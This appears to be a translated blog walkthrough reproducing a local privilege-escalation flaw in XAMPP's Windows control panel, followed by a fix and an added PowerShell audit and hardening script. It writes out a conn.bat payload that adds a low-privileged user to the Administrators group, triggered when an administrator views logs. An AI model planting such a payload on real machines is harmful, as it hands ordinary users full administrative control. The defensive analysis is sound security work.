Contents
1. XAMPP overview
2. Cause of the vulnerability
3. Affected versions
4. Environment setup
Download XAMPP
Check the root account and add the account lower
Log in as lower
Create the script conn.bat
Run XAMPP
Escalate to administrator privileges
Thoughts
1. XAMPP overview
XAMPP (Apache + MySQL + PHP + PERL) is a powerful integrated web-stack package.
The package was originally called LAMPP, but to avoid confusion the most recent versions were renamed XAMPP. It can be installed and used on Windows, Linux, Solaris, Mac OS X and other operating systems, and it supports multiple languages. XAMPP really is very easy to install and use: just download, unpack and start. It is similar to phpStudy.
2. Cause of the vulnerability
On Windows, XAMPP allows non-administrator accounts to access and modify its editor and browser settings. The default editor setting is notepad.exe. Once the setting is changed, it is changed for every user who can open the XAMPP control panel. If an attacker sets the editor value to a malicious .exe or .bat file, then as soon as an administrator account views the Apache log file through the XAMPP control panel, the malicious .exe or .bat file is executed, which yields arbitrary command execution.
3. Affected versions
Apache Friends XAMPP <7.2.29
Apache Friends XAMPP 7.3.*,<7.3.16
Apache Friends XAMPP 7.4.*,<7.4.4
4. Environment setup
Download XAMPP


Check the root account and add the account lower

Log in as lower

Create the script conn.bat
As the lower user, create the conn.bat script; its purpose is to add the lower user to the administrators group:
@echo off
rem add the account "lower" to the local Administrators group
net localgroup administrators lower /add
Run XAMPP

Apply and save. Then switch to the root user, right-click and run the XAMPP software as administrator.
Escalate to administrator privileges
Run the following command:

Thoughts
Looking back at the whole process, it really just adds XAMPP as one extra step; the core is nothing more than adding a user to the administrators group while running with administrator privileges:
net localgroup administrators lower /add ; under normal circumstances we could perform this step directly ourselves.
As it stands, the administrator side of XAMPP amounts to this: the command above is placed into the Config settings, and the Logs button is the key point that triggers the whole command execution. If the Logs button is not clicked, the command that adds the user to the administrators group is never run.
Below is the install file in the apache/logs folder:
Installing Apache HTTP Server 2.x with
DomainName = example.com
ServerName = www.example.com
ServerAdmin = admin@example.com
ServerPort = 80
ServerSslPort = 443
ServerRoot = c:/Apache24
Rewrote docs/conf/extra/httpd-autoindex.conf.in
to c:/Apache24/conf/original/extra/httpd-autoindex.conf
Rewrote docs/conf/extra/httpd-default.conf.in
to c:/Apache24/conf/original/extra/httpd-default.conf
Rewrote docs/conf/extra/httpd-ssl.conf.in
to c:/Apache24/conf/original/extra/httpd-ssl.conf
Rewrote docs/conf/extra/httpd-multilang-errordoc.conf.in
to c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
Rewrote docs/conf/extra/httpd-info.conf.in
to c:/Apache24/conf/original/extra/httpd-info.conf
Rewrote docs/conf/extra/httpd-userdir.conf.in
to c:/Apache24/conf/original/extra/httpd-userdir.conf
Rewrote docs/conf/extra/httpd-mpm.conf.in
to c:/Apache24/conf/original/extra/httpd-mpm.conf
Rewrote docs/conf/httpd.conf.in
to c:/Apache24/conf/original/httpd.conf
Rewrote docs/conf/extra/proxy-html.conf.in
to c:/Apache24/conf/original/extra/proxy-html.conf
Rewrote docs/conf/extra/httpd-vhosts.conf.in
to c:/Apache24/conf/original/extra/httpd-vhosts.conf
Rewrote docs/conf/extra/httpd-dav.conf.in
to c:/Apache24/conf/original/extra/httpd-dav.conf
Rewrote docs/conf/extra/httpd-languages.conf.in
to c:/Apache24/conf/original/extra/httpd-languages.conf
Rewrote docs/conf/extra/httpd-manual.conf.in
to c:/Apache24/conf/original/extra/httpd-manual.conf
Duplicated c:/Apache24/conf/original/extra/httpd-autoindex.conf
to c:/Apache24/conf/extra/httpd-autoindex.conf
Duplicated c:/Apache24/conf/original/extra/httpd-default.conf
to c:/Apache24/conf/extra/httpd-default.conf
Duplicated c:/Apache24/conf/original/extra/httpd-ssl.conf
to c:/Apache24/conf/extra/httpd-ssl.conf
Duplicated c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
to c:/Apache24/conf/extra/httpd-multilang-errordoc.conf
Duplicated c:/Apache24/conf/original/extra/httpd-info.conf
to c:/Apache24/conf/extra/httpd-info.conf
Duplicated c:/Apache24/conf/original/extra/httpd-userdir.conf
to c:/Apache24/conf/extra/httpd-userdir.conf
Duplicated c:/Apache24/conf/original/extra/httpd-mpm.conf
to c:/Apache24/conf/extra/httpd-mpm.conf
Duplicated c:/Apache24/conf/original/httpd.conf
to c:/Apache24/conf/httpd.conf
Duplicated c:/Apache24/conf/original/magic
to c:/Apache24/conf/magic
Duplicated c:/Apache24/conf/original/charset.conv
to c:/Apache24/conf/charset.conv
Duplicated c:/Apache24/conf/original/extra/proxy-html.conf
to c:/Apache24/conf/extra/proxy-html.conf
Duplicated c:/Apache24/conf/original/extra/httpd-vhosts.conf
to c:/Apache24/conf/extra/httpd-vhosts.conf
Duplicated c:/Apache24/conf/original/extra/httpd-dav.conf
to c:/Apache24/conf/extra/httpd-dav.conf
Duplicated c:/Apache24/conf/original/mime.types
to c:/Apache24/conf/mime.types
Duplicated c:/Apache24/conf/original/extra/httpd-languages.conf
to c:/Apache24/conf/extra/httpd-languages.conf
Duplicated c:/Apache24/conf/original/extra/httpd-manual.conf
to c:/Apache24/conf/extra/httpd-manual.conf
In the error file you can see the executed command's process:

Whether that command runs is determined entirely by where the configuration points.

The control panel is necessarily governed by its configuration file, which decides how it controls things and what it controls.

A practical fix is to remove normal users' (and ordinary administrators') permission to operate on that file, leaving only the super administrator able to.
For example:
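As an added defender-side example that is not part of the original post, the PowerShell script below audits the XAMPP control panel configuration for an editor or browser value that has been redirected to a script, checks whether any non-administrator principal can write to that file, and with -Harden applies the admin-only ACL the fix above describes. It assumes the default install path C:\xampp\xampp-control.ini and the Editor= / Browser= keys; adjust $IniPath if your installation differs.

```powershell
# Added audit/hardening helper, not part of the original post. Assumed:
# the control panel keeps its settings in C:\xampp\xampp-control.ini
# under Editor= and Browser= keys (adjust $IniPath if your install differs).
param(
    [string]$IniPath = 'C:\xampp\xampp-control.ini',
    [switch]$Harden
)

if (-not (Test-Path $IniPath)) { throw "Config not found: $IniPath" }
$findings = @()

# 1. Editor should still be the default notepad.exe, and neither key should
#    point at a batch or script file, which is the payload type described above.
foreach ($line in Get-Content $IniPath) {
    if ($line -match '^\s*(Editor|Browser)\s*=\s*(.*?)\s*$') {
        $key, $val = $Matches[1], $Matches[2]
        if ($key -eq 'Editor' -and $val -ne 'notepad.exe') {
            $findings += "Editor changed from default: '$val'"
        }
        if ($val -match '\.(bat|cmd|ps1|vbs|js)$') {
            $findings += "$key points at a script: '$val'"
        }
    }
}

# 2. Any Allow ACE granting write access to a non-admin principal means a
#    low-privileged user could plant the path that an admin later launches.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write
foreach ($ace in (Get-Acl $IniPath).Access) {
    $id = $ace.IdentityReference.Value
    $privileged = $id -match '\\(Administrators|SYSTEM|TrustedInstaller)$'
    if ($ace.AccessControlType -eq 'Allow' -and -not $privileged -and
        (([int]$ace.FileSystemRights) -band ([int]$writeMask)) -ne 0) {
        $findings += "Writable by non-admin principal $id ($($ace.FileSystemRights))"
    }
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } }
else { Write-Host "OK: $IniPath has the default editor and is writable by admins only" }

# 3. Optional fix: drop inherited ACEs, keep full control for Administrators
#    and SYSTEM, and leave ordinary users read-only.
if ($Harden) {
    icacls $IniPath /inheritance:r /grant:r 'Administrators:F' 'SYSTEM:F' 'Users:R'
}
```

Run the audit from an elevated prompt after installation and again after any control panel update, since a reinstall may restore the original file ACL.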


End!!!

Please credit the source when republishing. Original link: https://www.uj5u.com/qita/197144.html